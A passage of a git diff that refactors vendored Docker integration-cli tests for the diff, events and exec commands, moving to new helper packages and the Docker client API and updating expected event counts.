-		c.Assert(err, check.IsNil)
-		lookingFor = "C Files/foo/bar"
-	}
-
-	cleanCID := strings.TrimSpace(out)
-	out, _ = dockerCmd(c, "diff", cleanCID)
-
-	found := false
-	for _, line := range strings.Split(out, "\n") {
-		if strings.Contains(line, lookingFor) {
-			found = true
-			break
-		}
-	}
-	c.Assert(found, checker.True)
-}
-
-// test to ensure GH #3840 doesn't occur any more
-func (s *DockerSuite) TestDiffEnsureInitLayerFilesAreIgnored(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	// this is a list of files which shouldn't show up in `docker diff`
-	initLayerFiles := []string{"/etc/resolv.conf", "/etc/hostname", "/etc/hosts", "/.dockerenv"}
-	containerCount := 5
-
-	// we might not run into this problem from the first run, so start a few containers
-	for i := 0; i < containerCount; i++ {
-		containerCmd := `echo foo > /root/bar`
-		out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd)
-
-		cleanCID := strings.TrimSpace(out)
-		out, _ = dockerCmd(c, "diff", cleanCID)
-
-		for _, filename := range initLayerFiles {
-			c.Assert(out, checker.Not(checker.Contains), filename)
-		}
-	}
-}
-
-func (s *DockerSuite) TestDiffEnsureDefaultDevs(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "0")
-
-	cleanCID := strings.TrimSpace(out)
-	out, _ = dockerCmd(c, "diff", cleanCID)
-
-	expected := map[string]bool{
-		"C /dev":         true,
-		"A /dev/full":    true, // busybox
-		"C /dev/ptmx":    true, // libcontainer
-		"A /dev/mqueue":  true,
-		"A /dev/kmsg":    true,
-		"A /dev/fd":      true,
-		"A /dev/ptmx":    true,
-		"A /dev/null":    true,
-		"A /dev/random":  true,
-		"A /dev/stdout":  true,
-		"A /dev/stderr":  true,
-		"A /dev/tty1":    true,
-		"A /dev/stdin":   true,
-		"A /dev/tty":     true,
-		"A /dev/urandom": true,
-		"A /dev/zero":    true,
-	}
-
-	for _, line := range strings.Split(out, "\n") {
-		c.Assert(line == "" || expected[line], checker.True, check.Commentf(line))
-	}
-}
-
-// https://github.com/docker/docker/pull/14381#discussion_r33859347
-func (s *DockerSuite) TestDiffEmptyArgClientError(c *check.C) {
-	out, _, err := dockerCmdWithError("diff", "")
-	c.Assert(err, checker.NotNil)
-	c.Assert(strings.TrimSpace(out), checker.Contains, "Container name cannot be empty")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go
index 1fbfc742de..db1e34020f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go
@@ -2,21 +2,25 @@ package main
 
 import (
 	"bufio"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"io/ioutil"
-	"net/http"
 	"os"
 	"os/exec"
 	"strings"
 	"time"
 
+	"github.com/docker/docker/api/types"
 	eventtypes "github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/client"
 	eventstestutils "github.com/docker/docker/daemon/events/testutils"
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) {
@@ -32,7 +36,7 @@ func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) {
 	// List of available time formats to --since
 	unixTs := func(t time.Time) string { return fmt.Sprintf("%v", t.Unix()) }
 	rfc3339 := func(t time.Time) string { return t.Format(time.RFC3339) }
-	duration := func(t time.Time) string { return time.Now().Sub(t).String() }
+	duration := func(t time.Time) string { return time.Since(t).String() }
 
 	// --since=$start must contain only the 'untag' event
 	for _, f := range []func(time.Time) string{unixTs, rfc3339, duration} {
@@ -65,7 +69,7 @@ func (s *DockerSuite) TestEventsUntag(c *check.C) {
 		Command: []string{dockerBinary, "events", "--since=1"},
 		Timeout: time.Millisecond * 2500,
 	})
-	c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true})
+	result.Assert(c, icmd.Expected{Timeout: true})
 
 	events := strings.Split(result.Stdout(), "\n")
 	nEvents := len(events)
@@ -77,42 +81,6 @@ func (s *DockerSuite) TestEventsUntag(c *check.C) {
 	}
 }
 
-func (s *DockerSuite) TestEventsLimit(c *check.C) {
-	// Limit to 8 goroutines creating containers in order to prevent timeouts
-	// creating so many containers simultaneously on Windows
-	sem := make(chan bool, 8)
-	numContainers := 17
-	errChan := make(chan error, numContainers)
-
-	args := []string{"run", "--rm", "busybox", "true"}
-	for i := 0; i < numContainers; i++ {
-		sem <- true
-		go func() {
-			defer func() { <-sem }()
-			out, err := exec.Command(dockerBinary, args...).CombinedOutput()
-			if err != nil {
-				err = fmt.Errorf("%v: %s", err, string(out))
-			}
-			errChan <- err
-		}()
-	}
-
-	// Wait for all goroutines to finish
-	for i := 0; i < cap(sem); i++ {
-		sem <- true
-	}
-	close(errChan)
-
-	for err := range errChan {
-		c.Assert(err, checker.IsNil, check.Commentf("%q failed with error", strings.Join(args, " ")))
-	}
-
-	out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c))
-	events := strings.Split(out, "\n")
-	nEvents := len(events) - 1
-	c.Assert(nEvents, checker.Equals, 64, check.Commentf("events should be limited to 64, but received %d", nEvents))
-}
-
 func (s *DockerSuite) TestEventsContainerEvents(c *check.C) {
 	dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true")
 
@@ -221,7 +189,7 @@ func (s *DockerSuite) TestEventsImageImport(c *check.C) {
 	cleanedContainerID := strings.TrimSpace(out)
 
 	since := daemonUnixTime(c)
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "export", cleanedContainerID),
 		exec.Command(dockerBinary, "import", "-"),
 	)
@@ -254,7 +222,7 @@ func (s *DockerSuite) TestEventsImageLoad(c *check.C) {
 	dockerCmd(c, "load", "-i", "saveimg.tar")
 
 	result := icmd.RunCommand("rm", "-rf", "saveimg.tar")
-	c.Assert(result, icmd.Matches, icmd.Success)
+	result.Assert(c, icmd.Success)
 
 	out, _ = dockerCmd(c, "images", "-q", "--no-trunc", myImageName)
 	imageID := strings.TrimSpace(out)
@@ -377,11 +345,9 @@ func (s *DockerSuite) TestEventsFilterImageLabels(c *check.C) {
 	label := "io.docker.testing=image"
 
 	// Build a test image.
-	_, err := buildImage(name, fmt.Sprintf(`
+	buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`
 		FROM busybox:latest
-		LABEL %s`, label), true)
-	c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image"))
-
+		LABEL %s`, label)))
 	dockerCmd(c, "tag", name, "labelfiltertest:tag1")
 	dockerCmd(c, "tag", name, "labelfiltertest:tag2")
 	dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3")
@@ -445,25 +411,25 @@ func (s *DockerSuite) TestEventsCommit(c *check.C) {
 	// Problematic on Windows as cannot commit a running container
 	testRequires(c, DaemonIsLinux)
 
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 	cID := strings.TrimSpace(out)
-	c.Assert(waitRun(cID), checker.IsNil)
+	cli.WaitRun(c, cID)
 
-	dockerCmd(c, "commit", "-m", "test", cID)
-	dockerCmd(c, "stop", cID)
-	c.Assert(waitExited(cID, 5*time.Second), checker.IsNil)
+	cli.DockerCmd(c, "commit", "-m", "test", cID)
+	cli.DockerCmd(c, "stop", cID)
+	cli.WaitExited(c, cID, 5*time.Second)
 
 	until := daemonUnixTime(c)
-	out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until)
+	out = cli.DockerCmd(c, "events", "-f", "container="+cID, "--until="+until).Combined()
 	c.Assert(out, checker.Contains, "commit", check.Commentf("Missing 'commit' log event"))
 }
 
 func (s *DockerSuite) TestEventsCopy(c *check.C) {
 	// Build a test image.
-	id, err := buildImage("cpimg", `
+	buildImageSuccessfully(c, "cpimg", build.WithDockerfile(`
 		  FROM busybox
-		  RUN echo HI > /file`, true)
-	c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image"))
+		  RUN echo HI > /file`))
+	id := getIDByName(c, "cpimg")
 
 	// Create an empty test file.
 	tempFile, err := ioutil.TempFile("", "test-events-copy-")
@@ -488,13 +454,19 @@ func (s *DockerSuite) TestEventsCopy(c *check.C) {
 }
 
 func (s *DockerSuite) TestEventsResize(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	cID := strings.TrimSpace(out)
 	c.Assert(waitRun(cID), checker.IsNil)
 
-	endpoint := "/containers/" + cID + "/resize?h=80&w=24"
-	status, _, err := sockRequest("POST", endpoint, nil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	options := types.ResizeOptions{
+		Height: 80,
+		Width:  24,
+	}
+	err = cli.ContainerResize(context.Background(), cID, options)
 	c.Assert(err, checker.IsNil)
 
 	dockerCmd(c, "stop", cID)
@@ -508,9 +480,9 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) {
 	// TODO Windows CI: Figure out why this test fails intermittently (TP5).
 	testRequires(c, DaemonIsLinux)
 
-	out, _ := dockerCmd(c, "run", "-di", "busybox", "cat")
+	out := cli.DockerCmd(c, "run", "-di", "busybox", "cat").Combined()
 	cID := strings.TrimSpace(out)
-	c.Assert(waitRun(cID), checker.IsNil)
+	cli.WaitRun(c, cID)
 
 	cmd := exec.Command(dockerBinary, "attach", cID)
 	stdin, err := cmd.StdinPipe()
@@ -520,7 +492,10 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	defer stdout.Close()
 	c.Assert(cmd.Start(), checker.IsNil)
-	defer cmd.Process.Kill()
+	defer func() {
+		cmd.Process.Kill()
+		cmd.Wait()
+	}()
 
 	// Make sure we're done attaching by writing/reading some stuff
 	_, err = stdin.Write([]byte("hello\n"))
@@ -531,11 +506,11 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) {
 
 	c.Assert(stdin.Close(), checker.IsNil)
 
-	dockerCmd(c, "kill", cID)
-	c.Assert(waitExited(cID, 5*time.Second), checker.IsNil)
+	cli.DockerCmd(c, "kill", cID)
+	cli.WaitExited(c, cID, 5*time.Second)
 
 	until := daemonUnixTime(c)
-	out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until)
+	out = cli.DockerCmd(c, "events", "-f", "container="+cID, "--until="+until).Combined()
 	c.Assert(out, checker.Contains, "attach", check.Commentf("Missing 'attach' log event"))
 }
 
@@ -554,7 +529,7 @@ func (s *DockerSuite) TestEventsTop(c *check.C) {
 	// Problematic on Windows as Windows does not support top
 	testRequires(c, DaemonIsLinux)
 
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	cID := strings.TrimSpace(out)
 	c.Assert(waitRun(cID), checker.IsNil)
 
@@ -588,16 +563,16 @@ func (s *DockerRegistrySuite) TestEventsImageFilterPush(c *check.C) {
 }
 
 func (s *DockerSuite) TestEventsFilterType(c *check.C) {
+	// FIXME(vdemeester) fails on e2e run
+	testRequires(c, SameHostDaemon)
 	since := daemonUnixTime(c)
 	name := "labelfiltertest"
 	label := "io.docker.testing=image"
 
 	// Build a test image.
-	_, err := buildImage(name, fmt.Sprintf(`
+	buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`
 		FROM busybox:latest
-		LABEL %s`, label), true)
-	c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image"))
-
+		LABEL %s`, label)))
 	dockerCmd(c, "tag", name, "labelfiltertest:tag1")
 	dockerCmd(c, "tag", name, "labelfiltertest:tag2")
 	dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3")
@@ -628,7 +603,7 @@ func (s *DockerSuite) TestEventsFilterType(c *check.C) {
 	events = strings.Split(strings.TrimSpace(out), "\n")
 
 	// Events generated by the container that builds the image
-	c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events))
+	c.Assert(events, checker.HasLen, 2, check.Commentf("Events == %s", events))
 
 	out, _ = dockerCmd(
 		c,
@@ -686,7 +661,7 @@ func (s *DockerSuite) TestEventsContainerRestart(c *check.C) {
 
 	// wait until test2 is auto removed.
 	waitTime := 10 * time.Second
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		// Windows takes longer...
 		waitTime = 90 * time.Second
 	}
@@ -776,7 +751,7 @@ func (s *DockerSuite) TestEventsFormat(c *check.C) {
 func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) {
 	// make sure it fails immediately, without receiving any event
 	result := dockerCmdWithResult("events", "--format", "{{badFuncString .}}")
-	c.Assert(result, icmd.Matches, icmd.Expected{
+	result.Assert(c, icmd.Expected{
 		Error:    "exit status 64",
 		ExitCode: 64,
 		Err:      "Error parsing format: template: :1: function \"badFuncString\" not defined",
@@ -786,7 +761,7 @@ func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) {
 func (s *DockerSuite) TestEventsFormatBadField(c *check.C) {
 	// make sure it fails immediately, without receiving any event
 	result := dockerCmdWithResult("events", "--format", "{{.badFieldString}}")
-	c.Assert(result, icmd.Matches, icmd.Expected{
+	result.Assert(c, icmd.Expected{
 		Error:    "exit status 64",
 		ExitCode: 64,
 		Err:      "Error parsing format: template: :1:2: executing \"\" at <.badFieldString>: can't evaluate field badFieldString in type *events.Message",
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go
index dc91667116..343b900342 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go
@@ -10,13 +10,14 @@ import (
 	"os"
 	"os/exec"
 	"strings"
-	"syscall"
 	"time"
 	"unicode"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
 	"github.com/kr/pty"
+	"golang.org/x/sys/unix"
 )
 
 // #5979
@@ -48,7 +49,7 @@ func (s *DockerSuite) TestEventsRedirectStdout(c *check.C) {
 }
 
 func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) {
-	testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport)
+	testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport, NotPpc64le)
 
 	errChan := make(chan error)
 	go func() {
@@ -78,7 +79,7 @@ func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) {
 }
 
 func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) {
-	testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport)
+	testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport, NotPpc64le)
 
 	errChan := make(chan error)
 	observer, err := newEventObserver(c)
@@ -96,7 +97,7 @@ func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) {
 	}()
 
 	c.Assert(waitRun("oomTrue"), checker.IsNil)
-	defer dockerCmd(c, "kill", "oomTrue")
+	defer dockerCmdWithResult("kill", "oomTrue")
 	containerID := inspectField(c, "oomTrue", "Id")
 
 	testActions := map[string]chan bool{
@@ -111,7 +112,7 @@ func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) {
 	case <-time.After(20 * time.Second):
 		observer.CheckEventError(c, containerID, "oom", matcher)
 	case <-testActions["oom"]:
-		// ignore, done
+	// ignore, done
 	case errRun := <-errChan:
 		if errRun != nil {
 			c.Fatalf("%v", errRun)
@@ -184,11 +185,12 @@ func (s *DockerSuite) TestVolumeEvents(c *check.C) {
 	c.Assert(len(events), checker.GreaterThan, 4)
 
 	volumeEvents := eventActionsByIDAndType(c, events, "test-event-volume-local", "volume")
-	c.Assert(volumeEvents, checker.HasLen, 4)
+	c.Assert(volumeEvents, checker.HasLen, 5)
 	c.Assert(volumeEvents[0], checker.Equals, "create")
-	c.Assert(volumeEvents[1], checker.Equals, "mount")
-	c.Assert(volumeEvents[2], checker.Equals, "unmount")
-	c.Assert(volumeEvents[3], checker.Equals, "destroy")
+	c.Assert(volumeEvents[1], checker.Equals, "create")
+	c.Assert(volumeEvents[2], checker.Equals, "mount")
+	c.Assert(volumeEvents[3], checker.Equals, "unmount")
+	c.Assert(volumeEvents[4], checker.Equals, "destroy")
 }
 
 func (s *DockerSuite) TestNetworkEvents(c *check.C) {
@@ -310,11 +312,9 @@ func (s *DockerSuite) TestEventsImageUntagDelete(c *check.C) {
 	defer observer.Stop()
 
 	name := "testimageevents"
-	imageID, err := buildImage(name,
-		`FROM scratch
-		MAINTAINER "docker"`,
-		true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch
+		MAINTAINER "docker"`))
+	imageID := getIDByName(c, name)
 	c.Assert(deleteImages(name), checker.IsNil)
 
 	testActions := map[string]chan bool{
@@ -400,7 +400,7 @@ func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) {
 	daemonConfig := `{"labels":["foo=bar"]}`
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
-	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+	s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath))
 
 	// Get daemon ID
 	out, err := s.d.Cmd("info")
@@ -422,14 +422,39 @@ func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) {
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
 
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
 
 	time.Sleep(3 * time.Second)
 
 	out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c))
 	c.Assert(err, checker.IsNil)
 
-	c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s (cluster-advertise=, cluster-store=, cluster-store-opts={}, debug=true, default-runtime=runc, insecure-registries=[], labels=[\"bar=foo\"], live-restore=false, max-concurrent-downloads=1, max-concurrent-uploads=5, name=%s, runtimes=runc:{docker-runc []}, shutdown-timeout=10)", daemonID, daemonName))
+	// only check for values known (daemon ID/name) or explicitly set above,
+	// otherwise just check for names being present.
+	expectedSubstrings := []string{
+		" daemon reload " + daemonID + " ",
+		"(allow-nondistributable-artifacts=[",
+		" cluster-advertise=, ",
+		" cluster-store=, ",
+		" cluster-store-opts=",
+		" debug=true, ",
+		" default-ipc-mode=",
+		" default-runtime=",
+		" default-shm-size=",
+		" insecure-registries=[",
+		" labels=[\"bar=foo\"], ",
+		" live-restore=",
+		" max-concurrent-downloads=1, ",
+		" max-concurrent-uploads=5, ",
+		" name=" + daemonName,
+		" registry-mirrors=[",
+		" runtimes=",
+		" shutdown-timeout=10)",
+	}
+
+	for _, s := range expectedSubstrings {
+		c.Assert(out, checker.Contains, s)
+	}
 }
 
 func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) {
@@ -444,7 +469,7 @@ func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) {
 	daemonConfig := `{"labels":["foo=bar"]}`
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
-	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+	s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath))
 
 	// Get daemon ID
 	out, err := s.d.Cmd("info")
@@ -460,7 +485,7 @@ func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) {
 	}
 	c.Assert(daemonID, checker.Not(checker.Equals), "")
 
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
 
 	time.Sleep(3 * time.Second)
 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go
index cac76d96ae..e97fb85140 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go
@@ -4,8 +4,8 @@ package main
 
 import (
 	"bufio"
+	"context"
 	"fmt"
-	"net/http"
 	"os"
 	"os/exec"
 	"reflect"
@@ -15,9 +15,12 @@ import (
 	"sync"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestExec(c *check.C) {
@@ -68,7 +71,7 @@ func (s *DockerSuite) TestExecInteractive(c *check.C) {
 }
 
 func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) {
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 	cleanedContainerID := strings.TrimSpace(out)
 	c.Assert(waitRun(cleanedContainerID), check.IsNil)
 	dockerCmd(c, "restart", cleanedContainerID)
@@ -81,17 +84,13 @@ func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) {
 
 func (s *DockerDaemonSuite) TestExecAfterDaemonRestart(c *check.C) {
 	// TODO Windows CI: Requires a little work to get this ported.
-	testRequires(c, DaemonIsLinux)
-	testRequires(c, SameHostDaemon)
-
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top")
 	c.Assert(err, checker.IsNil, check.Commentf("Could not run top: %s", out))
 
-	err = s.d.Restart()
-	c.Assert(err, checker.IsNil, check.Commentf("Could not restart daemon"))
+	s.d.Restart(c)
 
 	out, err = s.d.Cmd("start", "top")
 	c.Assert(err, checker.IsNil, check.Commentf("Could not start top after daemon restart: %s", out))
@@ -134,19 +133,18 @@ func (s *DockerSuite) TestExecExitStatus(c *check.C) {
 	runSleepingContainer(c, "-d", "--name", "top")
 
 	result := icmd.RunCommand(dockerBinary, "exec", "top", "sh", "-c", "exit 23")
-	c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 23, Error: "exit status 23"})
+	result.Assert(c, icmd.Expected{ExitCode: 23, Error: "exit status 23"})
 }
 
 func (s *DockerSuite) TestExecPausedContainer(c *check.C) {
 	testRequires(c, IsPausable)
-	defer unpauseAllContainers()
 
-	out, _ := runSleepingContainer(c, "-d", "--name", "testing")
+	out := runSleepingContainer(c, "-d", "--name", "testing")
 	ContainerID := strings.TrimSpace(out)
 
 	dockerCmd(c, "pause", "testing")
-	out, _, err := dockerCmdWithError("exec", "-i", "-t", ContainerID, "echo", "hello")
-	c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new conmmand if it is paused"))
+	out, _, err := dockerCmdWithError("exec", ContainerID, "echo", "hello")
+	c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new command if it is paused"))
 
 	expected := ContainerID + " is paused, unpause the container before exec"
 	c.Assert(out, checker.Contains, expected, check.Commentf("container should not exec new command if it is paused"))
@@ -210,6 +208,7 @@ func (s *DockerSuite) TestExecTTYWithoutStdin(c *check.C) {
 	}
 }
 
+// FIXME(vdemeester) this should be a unit tests on cli/command/container package
 func (s *DockerSuite) TestExecParseError(c *check.C) {
 	// TODO Windows CI: Requires some extra work. Consider copying the
 	// runSleepingContainer helper to have an exec version.
@@ -217,10 +216,11 @@ func (s *DockerSuite) TestExecParseError(c *check.C) {
 	dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top")
 
 	// Test normal (non-detached) case first
-	cmd := exec.Command(dockerBinary, "exec", "top")
-	_, stderr, _, err := runCommandWithStdoutStderr(cmd)
-	c.Assert(err, checker.NotNil)
-	c.Assert(stderr, checker.Contains, "See 'docker exec --help'")
+	icmd.RunCommand(dockerBinary, "exec", "top").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Error:    "exit status 1",
+		Err:      "See 'docker exec --help'",
+	})
 }
 
 func (s *DockerSuite) TestExecStopNotHanging(c *check.C) {
@@ -229,18 +229,18 @@ func (s *DockerSuite) TestExecStopNotHanging(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
 
-	err := exec.Command(dockerBinary, "exec", "testing", "top").Start()
-	c.Assert(err, checker.IsNil)
+	result := icmd.StartCmd(icmd.Command(dockerBinary, "exec", "testing", "top"))
+	result.Assert(c, icmd.Success)
+	go icmd.WaitOnCmd(0, result)
 
 	type dstop struct {
-		out []byte
+		out string
 		err error
 	}
-
 	ch := make(chan dstop)
 	go func() {
-		out, err := exec.Command(dockerBinary, "stop", "testing").CombinedOutput()
-		ch <- dstop{out, err}
+		result := icmd.RunCommand(dockerBinary, "stop", "testing")
+		ch <- dstop{result.Combined(), result.Error}
 		close(ch)
 	}()
 	select {
@@ -262,7 +262,7 @@ func (s *DockerSuite) TestExecCgroup(c *check.C) {
 
 	var wg sync.WaitGroup
 	var mu sync.Mutex
-	execCgroups := []sort.StringSlice{}
+	var execCgroups []sort.StringSlice
 	errChan := make(chan error)
 	// exec a few times concurrently to get consistent failure
 	for i := 0; i < 5; i++ {
@@ -305,7 +305,7 @@ func (s *DockerSuite) TestExecCgroup(c *check.C) {
 }
 
 func (s *DockerSuite) TestExecInspectID(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	id := strings.TrimSuffix(out, "\n")
 
 	out = inspectField(c, id, "ExecIDs")
@@ -357,15 +357,21 @@ func (s *DockerSuite) TestExecInspectID(c *check.C) {
 	}
 
 	// But we should still be able to query the execID
-	sc, body, err := sockRequest("GET", "/exec/"+execID+"/json", nil)
-	c.Assert(sc, checker.Equals, http.StatusOK, check.Commentf("received status != 200 OK: %d\n%s", sc, body))
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	_, err = cli.ContainerExecInspect(context.Background(), execID)
+	c.Assert(err, checker.IsNil)
 
 	// Now delete the container and then an 'inspect' on the exec should
 	// result in a 404 (not 'container not running')
 	out, ec := dockerCmd(c, "rm", "-f", id)
 	c.Assert(ec, checker.Equals, 0, check.Commentf("error removing container: %s", out))
-	sc, body, err = sockRequest("GET", "/exec/"+execID+"/json", nil)
-	c.Assert(sc, checker.Equals, http.StatusNotFound, check.Commentf("received status != 404: %d\n%s", sc, body))
+
+	_, err = cli.ContainerExecInspect(context.Background(), execID)
+	expected := "No such exec instance"
+	c.Assert(err.Error(), checker.Contains, expected)
 }
 
 func (s *DockerSuite) TestLinksPingLinkedContainersOnRename(c *check.C) {
@@ -388,10 +394,12 @@ func (s *DockerSuite) TestRunMutableNetworkFiles(c *check.C) {
 	// Not applicable on Windows to Windows CI.
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 	for _, fn := range []string{"resolv.conf", "hosts"} {
-		deleteAllContainers()
+		containers := cli.DockerCmd(c, "ps", "-q", "-a").Combined()
+		if containers != "" {
+			cli.DockerCmd(c, append([]string{"rm", "-fv"}, strings.Split(strings.TrimSpace(containers), "\n")...)...)
+		}
 
-		content, err := runCommandAndReadContainerFile(fn, exec.Command(dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn)))
-		c.Assert(err, checker.IsNil)
+		content := runCommandAndReadContainerFile(c, fn, dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn))
 
 		c.Assert(strings.TrimSpace(string(content)), checker.Equals, "success", check.Commentf("Content was not what was modified in the container", string(content)))
 
@@ -443,30 +451,27 @@ func (s *DockerSuite) TestExecWithPrivileged(c *check.C) {
 	dockerCmd(c, "run", "-d", "--name", "parent", "--cap-drop=ALL", "busybox", "sh", "-c", `while (true); do if [ -e /exec_priv ]; then cat /exec_priv && mknod /tmp/sda b 8 0 && echo "Success"; else echo "Privileged exec has not run yet"; fi; usleep 10000; done`)
 
 	// Check exec mknod doesn't work
-	cmd := exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16")
-	out, _, err := runCommandWithOutput(cmd)
-	c.Assert(err, checker.NotNil, check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail"))
-	c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail"))
+	icmd.RunCommand(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 
 	// Check exec mknod does work with --privileged
-	cmd = exec.Command(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`)
-	out, _, err = runCommandWithOutput(cmd)
-	c.Assert(err, checker.IsNil)
